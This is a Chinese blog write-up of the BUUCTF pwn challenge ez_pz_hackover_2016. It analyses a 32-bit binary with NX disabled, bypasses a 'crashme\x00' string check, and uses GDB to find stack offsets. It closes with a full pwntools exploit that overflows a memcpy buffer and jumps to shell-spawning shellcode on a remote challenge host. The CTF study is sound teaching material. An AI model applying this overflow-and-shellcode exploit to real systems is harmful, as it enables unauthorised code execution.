【BUUCTFPWN】ez_pz_hackover_2016 | shellcode 动态调试查找参数在栈空间中的偏移

最新推荐文章于 2024-08-28 11:55:31 发布
最新推荐文章于 2024-08-28 11:55:31 发布
阅读量345 收藏 1
点赞数 1
分类专栏: PWN 文章标签: 安全 c语言
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_55368674/article/details/128737605
版权
文章介绍了如何分析一个具有栈溢出漏洞的程序,通过检查函数如fgets、strlen和memchr的使用,绕过输入检测,并利用shellcode来执行代码。通过GDB调试确定了payload的构造方法,包括输入字符串与EBP的偏移以及shellcode地址,最终编写并发送exploit来控制程序执行。
摘要由CSDN通过智能技术生成

简单的checksec一下,NX没开,感觉要用shellcode
在这里插入图片描述
运行一下,输入name然后回显,程序结束。
在这里插入图片描述

IDA32反编译看一看,main函数里有两个函数,header函数就是输出个图形,程序的主要部分在chall函数中。
在这里插入图片描述

查看一下chall函数中的内容,第一个红框处给出了一个栈上地址;第二个红框处,是判断用户输入的字符串时候跟crashme相同,相同才能进入vuln函数,我们可以用b'crashme\x00'构造一下,就绕过了。vuln函数中是一个简单的memcpy栈溢出漏洞。
在这里插入图片描述
在这里插入图片描述

下面来解读一下这一部分程序的作用
在这里插入图片描述
先一次解读一下每个函数怎么使用

fgets函数详解:

# include <stdio.h>
char *fgets(char *s, int size, FILE *stream);

s是缓冲区的位置;
size是接收的大小;
stream可以使stdin,也可以是文件。
例子:

# include <stdio.h>
int main(void)
{
    char str[20];  /*定义一个最大长度为19, 末尾是'\0'的字符数组来存储字符串*/
    printf("请输入一个字符串:");
    fgets(str, 7, stdin);  /*从输入流stdin即输入缓冲区中读取7个字符到字符数组str中*/
    printf("%s\n", str);
    return 0;
}

结果:

请输入一个字符串:i love you
i love

多出的部分不会进入栈

strlen函数

这个就不多说了,复制字符串,遇到\x00结束,计算长度时,不带上\x00。

memchr函数

描述

C 库函数 void *memchr(const void *str, int c, size_t n) 在参数 str 所指向的字符串的前 n 个字节中搜索第一次出现字符 c(一个无符号字符)的位置。

函数声明
void *memchr(const void *str, int c, size_t n)
参数

str – 指向要执行搜索的内存块。
c – 以 int 形式传递的值,但是函数在每次字节搜索时是使用该值的无符号字符形式。
n – 要被分析的字节数。

返回值

该函数返回一个指向匹配字节的指针,如果在给定的内存区域未出现字符,则返回 NULL。

再看一下题中程序
在这里插入图片描述

前面说到,我们要绕过下面的检测,必须要像这样构造payload

payload = b'crashme\x00' + shellcode + shellcode_addr

那么此时,strlen返回的结果是7,memchr在前七个字符里,找不到’\n’。所以,这一块的一串语句一点作用也没有,自己写了个c程序验证了一下,确实是这样。
在这里插入图片描述

此时,我们要做的就是找到栈上shellcode的地址和ebp的差值就行了,首先我们要找的是我们输入的字符串到ebp的差值。我们使用gdb打开文件,在vuln函数中有一个nop指令,我们在此处设置定点。
在这里插入图片描述
在这里插入图片描述
程序首先输出了一个栈上地址0xffffcbec,输入crash,然后我们在程序运行到的地方使用stack 40查看栈上的前40项。
在这里插入图片描述
输入点到ebp的距离太小,没办法放下shellcode,所以我们放到返回地址后面。

ebp到输入点的距离 = 0xffffcbc8 - 0xffffcbb2 = 22
shellcode的地址 = 0xffffcbec - 0xffffbd0 = 0x1c

构造的payload如下:

payload = b 'crashme\x00'.ljust(22+4,b'\x00')
payload += p32(s - 0x1c) + shellcode

完整exploit

from pwn import*
context.binary = './bin'
elf = context.binary
io = remote('node4.buuoj.cn',26866)
shellcode = asm(shellcraft.sh())
print(len(shellcode))
io.recvuntil(b'crash:')
s = int(io.recv(10),16)
print(hex(s))
payload = b'crashme\x00'.ljust(26,b'\x00')
payload += p32(s - 0x1c) + shellcode
io. sendlineafter(b'>' ,payload)
io. interactive( )
Razors_
关注
专栏目录
ez_pz_hackover_2016
m0_52231248的博客
11-18 152
ez_pz_hackover_2016 Checksec: Ida: Fgets会读取我们的输入但存在一个strlen检查,我们知道strlen在读入/x00就会停止。 同时当我们的输入包含crashme的时候会进入vlun函数, Vlun函数里的memcpy会拷贝我们之前的输入,存在溢出 所以我们只需要构造payload=crashme/x00+偏移+返回地址+shellcode就行了 Crashme/X00到ebp的偏移: 0xffffcd58-0xffffcd42=0x16
BUUCTF pwn ez_pz_hackover_2016
菜的只能随便写写博客
02-21 2384
0x01 文件分析  没有不可执行和段上的读写保护,可以做到很多事情。   0x02 运行  输入name并且回显,上面还有一个地址。   0x03 IDA  主要的漏洞点在这个函数内部的,chall的大小很大,足够写入shellcode,之后的vuln函数会将s的数据复制到vuln的上面,但是复制的数据量远远大于的长度,会造成溢出。  并且此函数的的地址直接打印出来,不用再去...
[PWN] BUUCTF ez_pz_hackover_2016 1
空城惜梦的博客
06-08 724
[PWN] BUUCTF ez_pz_hackover_2016 1解题分析漏洞利用payload分析输入点与ebp距离的计算方法泄露的地址与shellcode偏移量payload 解题分析 按照惯例先checksec一下,除了RELRO,其他都没开 执行,观察程序运行逻辑,给出一个地址,然后让我们输入name 32IDA打开程序,观察main函数,header()只是打印图形,chall()才是关键函数 在chall先输出s的地址,之后fgets接收一个不大于1023(0x3ff)的字符到s的缓
BUUCTF ez_pz_hackover_2016
最新发布
m0_73743784的博客
08-28 357
需要注意dest到ebp的距离,使用 IDA Pro 分析时并不一定是正确的,需要配合动态调试才能真正确定利用偏移值可以间接确定写入shellcode
BUUCTF pwn ez_pz_hackover_2016(write up)
qq_44768749的博客
08-23 448
BUUCTF pwn ez_pz_hackover_20160x01 文件分析0x02 运行0x03 IDA0x04 思路0x05 exp 0x01 文件分析 没有不可执行和段上的读写保护。 0x02 运行 输入name后发现上面还有一个地址。 0x03 IDA 若输入crashme,即可进入vlun函数,主要的漏洞点在这个函数内部的,chall的大小很大,足够写 入shellcode,之后的vuln函数会将name的数据复制到vuln的上面,而且复制的数据量远远大于的 长度,会造
JMPESP.rar_jmp_jmp esp_jmp9.02 crack_shellcode_sp3 jmp esp
09-24
获取jmp esp地址程序,shellcode编写需要用到
此源代码将生成 linux x86的 shellcode.rar_linux shellcode_shell
09-20
5. **测试和调试**:在沙箱环境或模拟器测试shellcode,确保其在预期环境下能正确工作。 学习和理解shellcode编写不仅可以帮助安全研究人员更好地了解和防御黑客攻击,也有助于逆向工程师和软件开发者增强对底层...
3S软件
Zzzpiu的博客
12-29 467
地址:https://www.ixxin.cn/software.html 转载地址:https://www.ixxin.cn/software.html
BUUCTF-ez_pz_hackover_2016
Rt1Text的博客
11-28 438
challC 库函数 - strcmp()C 库函数 int strcmp(const char *str1, const char *str2) 把 str1 所指向的字符串和 str2 所指向的字符串进行比较。strcmp只能比较字符串,比较数组和字符串常量,不能比较数字等其他形式的参数。两个字符串自左向右逐个字符相比(按ASCII值大小相比较),直到出现不同的字符或遇'\0'为止strcmp的返回值可控,传入空字符串即可strlen同样遇0截断。
[BUUCTF-pwn]——ez_pz_hackover_2016
Y_peak的博客
02-15 345
[BUUCTF-pwn]——ez_pz_hackover_2016 题目地址:https://buuoj.cn/challenges#ez_pz_hackover_2016 checksec一下,NX都没开,十有八九是让自己写shellcode了 在IDA,main里面没什么可以看的. 在chall函数发现,0x40C = 1036 > 1023无法溢出。不过总算找到可以写shellcode 的地方。 发现vuln函数,只要通过输入"crashme\x00"就可以绕过检查,执行vuln
memcpy
weixin_45959515的博客
08-26 182
memcpy指的是C和C++使用的内存拷贝函数,函数原型为void *memcpy(void *destin, void *source, unsigned n);函数的功能是从源内存地址的起始位置开始拷贝若干个字节到目标内存地址,即从源source拷贝n个字节到目标destin。 memcpy(c, temp, sizeof(char) * temp_size); ...
ctf【ez_pz_hackover_2016
HUANGliang_的博客
10-29 204
ez_pz_hackover_2016
others_shellcode
07-28
others_shellcode是一种外部的、已编写好的机器码程序,在计算机系统用于执行恶意行为,例如攻击、病毒、木马等。它可以被黑客选用,注入到受害者主机的内存,并被执行。由于others_shellcode本身就是已经准备好的机器码程序,所以它可以绕过各种安全措施,不易被检测到,对系统造成更大的威胁。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值